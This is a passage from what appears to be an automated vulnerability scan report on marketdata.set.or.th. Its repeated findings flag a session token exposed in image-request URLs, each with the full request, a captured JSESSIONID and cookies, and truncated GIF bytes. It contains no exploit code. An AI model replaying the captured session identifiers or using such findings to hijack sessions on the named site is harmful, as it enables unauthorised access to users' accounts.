12.3. http://marketdata.set.or.th/mkt/images/button-orange.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/button-orange.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/button-orange.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:44 GMT
Server: Apache-Coyote/1.1
ETag: W/"657-1303176634000"
Last-Modified: Tue, 19 Apr 2011 01:30:34 GMT
Content-Type: image/gif
Content-Length: 657

GIF89a............b....................... ..........y.....s...........h...........w,..[.o.....|.........r.......................3..+.....M..    ..+.....
.h..............b..l.............................
...[SNIP]...

12.4. http://marketdata.set.or.th/mkt/images/email-setcallcenter.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/email-setcallcenter.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/email-setcallcenter.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:38 GMT
Server: Apache-Coyote/1.1
ETag: W/"228-1303176636000"
Last-Modified: Tue, 19 Apr 2011 01:30:36 GMT
Content-Type: image/gif
Content-Length: 228

GIF89ax............!.......,....x........................H.....
..{..!.4......].....B(....d..4Rv
g.Ht,....w.V..r...m.`........Q.\..Ifc...DEV4G.(.....w..x....Xi.t..8...)...I4..
he..X*.*.......h.....I..
...[SNIP]...

12.5. http://marketdata.set.or.th/mkt/images/icon-go.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/icon-go.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/icon-go.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:48 GMT
Server: Apache-Coyote/1.1
ETag: W/"277-1303176632000"
Last-Modified: Tue, 19 Apr 2011 01:30:32 GMT
Content-Type: image/gif
Content-Length: 277

GIF89a!........w..D....."..f...........w..3.....D..3..".{.....t...U.........................f................!.......,....!......`..di.():\..p,s.8..k....9.NF.P...".........,......LdP....q].C..fp...F..
...[SNIP]...

12.6. http://marketdata.set.or.th/mkt/images/icon-print-en01.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/icon-print-en01.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/icon-print-en01.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:43 GMT
Server: Apache-Coyote/1.1
ETag: W/"303-1303176634000"
Last-Modified: Tue, 19 Apr 2011 01:30:34 GMT
Content-Type: image/gif
Content-Length: 303

GIF89a;......?_.......___..?..........................._._.....??_.V.....................................!.......,....;...... %.di.h..l..p,.t.FB..v.
...+
)..n@4...D.69UmP..!u^g...$.H.........o.@.
...[SNIP]...

12.7. http://marketdata.set.or.th/mkt/images/icon-thai01.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/icon-thai01.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/icon-thai01.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:52 GMT
Server: Apache-Coyote/1.1
ETag: W/"162-1303176654000"
Last-Modified: Tue, 19 Apr 2011 01:30:54 GMT
Content-Type: image/gif
Content-Length: 162

GIF89a9.......V..........!.......,....9.....s...........3....t"H
bW.&`.^.n...q..[..._..|+..W..t.a2.*......Zju.#B8.F.U......e.Xh%~.ie....oV....A..H1X..........P..;

12.8. http://marketdata.set.or.th/mkt/images/leftbox-top.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/leftbox-top.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/leftbox-top.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:04:14 GMT
Server: Apache-Coyote/1.1
ETag: W/"105-1303176638000"
Last-Modified: Tue, 19 Apr 2011 01:30:38 GMT
Content-Type: image/gif
Content-Length: 105

GIF89a..    ..........!.......,......    ...@..............{...H.f.......Gj....O3........Q"...L_r..Ja...J....;

12.9. http://marketdata.set.or.th/mkt/images/middlebox-bgtop.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/middlebox-bgtop.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/middlebox-bgtop.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:07:03 GMT
Server: Apache-Coyote/1.1
ETag: W/"170-1303176648000"
Last-Modified: Tue, 19 Apr 2011 01:30:48 GMT
Content-Type: image/gif
Content-Length: 170

GIF89a.....................&.............................5.. ..F..)..........................................!.......,..........'.$M..9N.=...p.+. ,K. .a4.#.....B.. .H!.;

12.10. http://marketdata.set.or.th/mkt/images/middlebox-bottom-bg.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/middlebox-bottom-bg.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/middlebox-bottom-bg.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:07:24 GMT
Server: Apache-Coyote/1.1
ETag: W/"818-1303176638000"
Last-Modified: Tue, 19 Apr 2011 01:30:38 GMT
Content-Type: image/gif
Content-Length: 818

GIF89a..................................................................................................................................................................................................
...[SNIP]...

12.11. http://marketdata.set.or.th/mkt/images/middlebox-bottomleft.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/middlebox-bottomleft.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/middlebox-bottomleft.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:07:19 GMT
Server: Apache-Coyote/1.1
ETag: W/"880-1303176652000"
Last-Modified: Tue, 19 Apr 2011 01:30:52 GMT
Content-Type: image/gif
Content-Length: 880

GIF89a
.................................................................................................................................................................................................
...[SNIP]...

12.12. http://marketdata.set.or.th/mkt/images/middlebox-bottomright.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/middlebox-bottomright.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/middlebox-bottomright.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:52 GMT
Server: Apache-Coyote/1.1
ETag: W/"886-1303176634000"
Last-Modified: Tue, 19 Apr 2011 01:30:34 GMT
Content-Type: image/gif
Content-Length: 886

GIF89a
.................................................................................................................................................................................................
...[SNIP]...

12.13. http://marketdata.set.or.th/mkt/images/middlebox-topleft.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/middlebox-topleft.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/middlebox-topleft.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:38 GMT
Server: Apache-Coyote/1.1
ETag: W/"663-1303176636000"
Last-Modified: Tue, 19 Apr 2011 01:30:36 GMT
Content-Type: image/gif
Content-Length: 663

GIF89a
....v...............&..2..6..!...........H..7....."..&..,..0..*..>..G..F..8.....-.....&.....'..4..%..'........'.....0.....D...........<..>..K..%..!........ ..-..3..9..-..9...../..X.. ........C.
...[SNIP]...

12.14. http://marketdata.set.or.th/mkt/images/middlebox-topright.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/middlebox-topright.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/middlebox-topright.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:40 GMT
Server: Apache-Coyote/1.1
ETag: W/"660-1303176646000"
Last-Modified: Tue, 19 Apr 2011 01:30:46 GMT
Content-Type: image/gif
Content-Length: 660

GIF89a
....u...............&..2..6..!...........H..7....."..&..,..0..*..>..G..F..8.....-.....&..'..4..%..'........'.....0.....D........<..>..K..%..!........ ..-..3..9..-..9...../.. ..C..+.....$.......
...[SNIP]...

12.15. http://marketdata.set.or.th/mkt/images/rightbox-top.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/rightbox-top.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/rightbox-top.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:48 GMT
Server: Apache-Coyote/1.1
ETag: W/"134-1303176652000"
Last-Modified: Tue, 19 Apr 2011 01:30:52 GMT
Content-Type: image/gif
Content-Length: 134

GIF89a..
............................!.......,......
...KH...0.I..8...[`(.^i.h..c..p,....u...u...p..1....b|-.Pd...Zs.A......A.K.g....;

12.16. http://marketdata.set.or.th/mkt/images/rss.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/rss.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/rss.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:53 GMT
Server: Apache-Coyote/1.1
ETag: W/"458-1303176640000"
Last-Modified: Tue, 19 Apr 2011 01:30:40 GMT
Content-Type: image/gif
Content-Length: 458

GIF89a.....?...4....|...-..U.U
.....5........g.....Z....k
.|6....m)....._.t..-.....|.tF.lC.b.....m..r.....vF.rE....d..e.qB..H........t.j..yK..B..>.a...q....oA..q.uB..&.......n?..8.d..i..^......7....
...[SNIP]...

12.17. http://marketdata.set.or.th/mkt/images/spacer.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/spacer.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/spacer.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:04:15 GMT
Server: Apache-Coyote/1.1
ETag: W/"67-1303176632000"
Last-Modified: Tue, 19 Apr 2011 01:30:32 GMT
Content-Type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

12.18. http://marketdata.set.or.th/mkt/images/tab-blue-bg.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/tab-blue-bg.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/tab-blue-bg.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: verify=test; JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=213194248.998969890.1304449190.1304449190.1304449190.1; __utmb=213194248; __utmc=213194248; __utmz=213194248.1304449190.1.1.utmccn=(referral)|utmcsr=set.or.th|utmcct=/en/sitemap/for_listing.html|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:07:04 GMT
Server: Apache-Coyote/1.1
ETag: W/"57-1303176654000"
Last-Modified: Tue, 19 Apr 2011 01:30:54 GMT
Content-Type: image/gif
Content-Length: 57

GIF89a.......Xq..........!.......,..........
...........;

12.19. http://marketdata.set.or.th/mkt/images/tab-blue-left.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/tab-blue-left.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/tab-blue-left.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:46 GMT
Server: Apache-Coyote/1.1
ETag: W/"183-1303176638000"
Last-Modified: Tue, 19 Apr 2011 01:30:38 GMT
Content-Type: image/gif
Content-Length: 183

GIF89a.......bz.Xq....az.u.....Zu.]x.h...........\{.......w.....q..Yr.]v....^....Zz.........................!.......,..........4 f.. ..`D..L..e.S%3.89}4=.C...h.....1...SIuF..lUJ8...;

12.20. http://marketdata.set.or.th/mkt/images/tab-blue-right.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/tab-blue-right.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/tab-blue-right.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: JSESSIONID=C79B035F62797B23B65F20B1E721575B; _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:06:55 GMT
Server: Apache-Coyote/1.1
ETag: W/"176-1303176644000"
Last-Modified: Tue, 19 Apr 2011 01:30:44 GMT
Content-Type: image/gif
Content-Length: 176

GIF89a.......Ys.f..Xr.Xr..........w.......m....._x.Xq.Zu.k........]w.]z....Xs...............................!.......,..........-...T    =CRZ.2).k.."[.t....7K%8..eGVRHl..H.Rja...;

12.21. http://marketdata.set.or.th/mkt/images/tab-grey-bg.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/images/tab-grey-bg.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /mkt/images/tab-grey-bg.gif;jsessionid=C79B035F62797B23B65F20B1E721575B HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
